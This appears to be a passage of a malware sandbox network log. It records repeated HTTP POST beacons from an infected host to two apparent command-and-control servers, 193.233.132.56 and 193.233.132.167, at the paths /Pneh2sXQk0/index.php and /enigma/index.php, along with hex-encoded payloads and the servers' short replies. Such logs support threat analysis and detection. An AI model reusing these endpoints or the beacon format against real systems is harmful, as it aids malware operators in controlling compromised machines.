                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.557913065 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1186192.168.2.551040193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.805366993 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.052229881 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1187192.168.2.551041193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.908648014 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.150096893 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1188192.168.2.551042193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.403111935 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.651443958 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1189192.168.2.551043193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.404217005 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.657813072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1190192.168.2.551044193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.897315979 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.143723965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1191192.168.2.551045193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.026458025 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.274076939 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1192192.168.2.551046193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.489200115 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.734047890 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1193192.168.2.551047193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.525182962 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.778274059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1194192.168.2.551048193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.984570026 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.232873917 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1195192.168.2.551049193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.139039993 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.387048960 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1196192.168.2.551050193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.587800026 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.834525108 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1197192.168.2.551051193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.639159918 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:28.891321898 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1198192.168.2.551052193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.090085983 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.343575954 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1199192.168.2.551053193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.242252111 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.488976955 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1200192.168.2.551054193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.694365978 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.938884020 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1201192.168.2.551055193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:29.747419119 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.004163027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1202192.168.2.551056193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:30.191020012 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
